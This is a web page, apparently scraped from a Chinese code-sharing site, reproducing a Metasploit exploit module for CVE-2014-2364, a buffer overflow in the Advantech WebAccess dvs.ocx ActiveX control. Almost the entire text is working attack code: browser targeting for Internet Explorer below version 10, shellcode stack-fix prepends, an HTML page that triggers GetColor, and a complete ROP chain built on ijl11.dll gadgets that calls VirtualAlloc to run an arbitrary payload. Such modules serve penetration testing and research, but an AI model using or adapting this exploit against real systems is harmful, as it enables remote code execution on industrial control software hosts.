扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 |
## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer def initialize(info = {}) super(update_info(info, 'Name'=> 'Advantech WebAccess dvs.ocx GetColor Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow vulnerability in Advantec WebAccess. The vulnerability exists in the dvs.ocx ActiveX control, where a dangerous call to sprintf can be reached with user controlled data through the GetColor function. This module has been tested successfully on Windows XP SP3 with IE6 and Windows 7 SP1 with IE8 and IE 9. }, 'License' => MSF_LICENSE, 'Author'=> [ 'Unknown', # Vulnerability discovery 'juan vazquez' # Metasploit module ], 'References'=> [ ['CVE', '2014-2364'], ['ZDI', '14-255'], ['URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02'] ], 'DefaultOptions'=> { 'Retries'=> false, 'InitialAutoRunScript' => 'migrate -f' }, 'BrowserRequirements' => { :source=> /script|headers/i, :os_name => Msf::OperatingSystems::WINDOWS, :ua_name => /MSIE/i, :ua_ver=> lambda { |ver| Gem::Version.new(ver) <Gem::Version.new('10') }, :clsid => "{5CE92A27-9F6A-11D2-9D3D-000001155641}", :method=> "GetColor" }, 'Payload' => { 'Space' => 1024, 'DisableNops' => true, 'BadChars'=> "\x00\x0a\x0d\x5c", # Patch the stack to execute the decoder... 'PrependEncoder'=> "\x81\xc4\x9c\xff\xff\xff", # add esp, -100 # Fix the stack again, this time better :), before the payload # is executed. 'Prepend' => "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18] "\x83\xC0\x08" + # add eax, byte 8 "\x8b\x20" + # mov esp, [eax] "\x81\xC4\x30\xF8\xFF\xFF"# add esp, -2000 }, 'Platform'=> 'win', 'Arch'=> ARCH_X86, 'Targets' => [ [ 'Automatic', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate'=> 'Jul 17 2014')) end def on_request_exploit(cli, request, target_info) print_status("Requested: #{request.uri}") content = <<-EOS <html> <head> <meta http-equiv="cache-control" content="max-age=0" /> <meta http-equiv="cache-control" content="no-cache" /> <meta http-equiv="expires" content="0" /> <meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" /> <meta http-equiv="pragma" content="no-cache" /> </head> <body> <object classid='clsid:5CE92A27-9F6A-11D2-9D3D-000001155641' id='test' /></object> <script language='javascript'> test.GetColor("#{rop_payload(get_payload(cli, target_info))}", 0); </script> </body> </html> EOS print_status("Sending #{self.name}") send_response_html(cli, content, {'Pragma' => 'no-cache'}) end # Uses gadgets from ijl11.dll 1.1.2.16 def rop_payload(code) xpl = rand_text_alphanumeric(61) # offset xpl << [0x60014185].pack("V")# RET xpl << rand_text_alphanumeric(8) # EBX = dwSize (0x40) xpl << [0x60012288].pack("V") # POP ECX # RETN xpl << [0xffffffff].pack("V") # ecx value xpl << [0x6002157e].pack("V") # POP EAX # RETN xpl << [0x9ffdafc9].pack("V") # eax value xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10 xpl << [0x60018084].pack("V") # POP EBP # RETN xpl << rand_text_alphanumeric(4) # padding xpl << rand_text_alphanumeric(4) # padding xpl << rand_text_alphanumeric(4) # padding xpl << rand_text_alphanumeric(4) # padding xpl << [0x60029f6c].pack("V") # .data ijl11.dll xpl << [0x60012288].pack("V") # POP ECX # RETN xpl << [0x60023588].pack("V") # ECX => (&POP EBX # RETN) xpl << [0x6001f1c8].pack("V") # push edx # or al,39h # push ecx # or byte ptr [ebp+5], dh # mov eax, 1 # ret # EDX = flAllocationType (0x1000) xpl << [0x60012288].pack("V") # POP ECX # RETN xpl << [0xffffffff].pack("V") # ecx value xpl << [0x6002157e].pack("V") # POP EAX # RETN xpl << [0x9ffdbf89].pack("V") # eax value xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10 # ECX = flProtect (0x40) xpl << [0x6002157e].pack("V") # POP EAX # RETN xpl << rand_text_alphanumeric(4) # padding xpl << rand_text_alphanumeric(4) # padding xpl << rand_text_alphanumeric(4) # padding xpl << rand_text_alphanumeric(4) # padding xpl << [0x60029f6c].pack("V") # .data ijl11.dll xpl << [0x60012288].pack("V") # POP ECX # RETN xpl << [0xffffffff].pack("V") # ecx value 0x41.times do xpl << [0x6001b8ec].pack("V") # INC ECX # MOV DWORD PTR DS:[EAX],ECX # RETN end # EAX = ptr to &VirtualAlloc() xpl << [0x6001db7e].pack("V") # POP EAX # RETN [ijl11.dll] xpl << [0x600250c8].pack("V") # ptr to &VirtualAlloc() [IAT ijl11.dll] # EBP = POP (skip 4 bytes) xpl << [0x6002054b].pack("V") # POP EBP # RETN xpl << [0x6002054b].pack("V") # ptr to &(# pop ebp # retn) # ESI = ptr to JMP [EAX] xpl << [0x600181cc].pack("V") # POP ESI # RETN xpl << [0x6002176e].pack("V") # ptr to &(# jmp[eax]) # EDI = ROP NOP (RETN) xpl << [0x60021ad1].pack("V") # POP EDI # RETN xpl << [0x60021ad2].pack("V") # ptr to &(retn) # ESP = lpAddress (automatic) # PUSHAD # RETN xpl << [0x60018399].pack("V") # PUSHAD # RETN xpl << [0x6001c5cd].pack("V") # ptr to &(# push esp # retn) xpl << code xpl.gsub!("\"", "\\\"") # Escape double quote, to not break javascript string xpl.gsub!("\\", "\\\\") # Escape back slash, to avoid javascript escaping xpl end end |
体验盒子
